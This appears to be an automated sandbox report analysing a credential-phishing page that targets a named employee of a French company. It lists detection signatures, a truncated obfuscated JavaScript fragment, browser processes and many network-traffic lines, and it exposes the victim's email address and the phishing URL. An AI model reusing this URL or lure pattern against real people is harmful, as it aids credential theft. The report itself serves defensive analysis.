Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com

Overview

General Information

Sample URL:https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
Analysis ID:1560013
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 4080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2032,i,11957097260044928520,15021406713333812890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comAvira URL Cloud: detection malicious, Label: malware
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: Number of links: 0
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: Title: Login to your account does not match URL
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comSample URL: PII: viviane.beigbeder@idcom-france.com
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: Iframe src: https://www.idcom-france.com
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: <input type="password" .../> found
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: No <meta name="author".. found
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: global trafficHTTP traffic detected: GET /request/index.html?userid=viviane.beigbeder@idcom-france.com HTTP/1.1Host: voyages-moinschers.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=idcom-france.com HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://voyages-moinschers.fr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FxaYLMr2BrGNYub&MD=cahBY3f6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FxaYLMr2BrGNYub&MD=cahBY3f6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: voyages-moinschers.fr
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.idcom-france.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
